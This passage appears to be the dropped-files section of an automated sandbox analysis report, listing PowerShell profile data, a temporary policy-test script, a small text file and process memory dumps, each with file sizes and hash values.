                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      f49846e1215a5d696ec24cd647d8ee0d

                                                                                                                      SHA1

                                                                                                                      5054bb39c38b5a18e5a6a5cdce15e0124e46f472

                                                                                                                      SHA256

                                                                                                                      478fbb6dc535c5c31f2ad1f530efadb1629696ecfb390d025f13a5cc5668f27e

                                                                                                                      SHA512

                                                                                                                      03356a6ef9cfed4eafc0b763df88f9690a682faf55bd5759ca154f28f84afca6e42bac52cf6af2657b5f2431f7993d03c35e510a7b8b9f7081b1f518f0e10f85

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      a2b24af1492f112d2e53cb7415fda39f

                                                                                                                      SHA1

                                                                                                                      dbfcee57242a14b60997bd03379cc60198976d85

                                                                                                                      SHA256

                                                                                                                      fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

                                                                                                                      SHA512

                                                                                                                      9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      fa4971f5945b4813eea651bbfe23af7a

                                                                                                                      SHA1

                                                                                                                      08975abfed3cd58cc981e3a54419a3e592002f5b

                                                                                                                      SHA256

                                                                                                                      7d091b10767a34e4e55ee70d1a76b12ccf76385e85731c09022bd42eb2d29ea1

                                                                                                                      SHA512

                                                                                                                      d4537fe7bd02514cfcddf2ca5514c79b16399770953c2965848a6809043b38413c326c36f3c1955a4aa49781f280bbdec6a5b6ec3c40222828d7230c8348b96a

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      c733b0977c7642d9c5a946c598ef08c5

                                                                                                                      SHA1

                                                                                                                      2d814dd91fa8b23740dfafa1941312b5c456ea85

                                                                                                                      SHA256

                                                                                                                      baf59921f970535dd5d31277777bdf583a2b152975cae133d6ac4360cd409cdd

                                                                                                                      SHA512

                                                                                                                      791c0a274f3760cddcd22cb03f82d8dafc8404a9df71c71024b1dc5c43e68fa51738e7f67ea8918be8ac47b0618609ccd84d10143f7a569b77e13af0aaf228d0

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vil0apu3.j0y.ps1

                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • C:\Users\Admin\Music\ouch.txt

                                                                                                                      Filesize

                                                                                                                      7B

                                                                                                                      MD5

                                                                                                                      9ef85361be570fc2ae05ca953d53635e

                                                                                                                      SHA1

                                                                                                                      7680abd3180169fe2751d8942618ce6d18b9cf1c

                                                                                                                      SHA256

                                                                                                                      38e3938779399b844ea1fa108e0e2adc4e12cac862de8d4dae181d0beb50d48f

                                                                                                                      SHA512

                                                                                                                      3690810e4b5ad14fb655cd05c681c87bbf436b2d2aa7e9478e9f53e0aae37681e84dd8b534762b2cde4f7e843b13506abc03b1e50fd41732dcef7771eaf47f90

                                                                                                                    • memory/4172-16-0x00007FFACEE00000-0x00007FFACF8C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4172-0-0x00007FFACEE03000-0x00007FFACEE05000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4172-12-0x00007FFACEE00000-0x00007FFACF8C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4172-1-0x0000023CC9780000-0x0000023CC97A2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/4172-11-0x00007FFACEE00000-0x00007FFACF8C1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB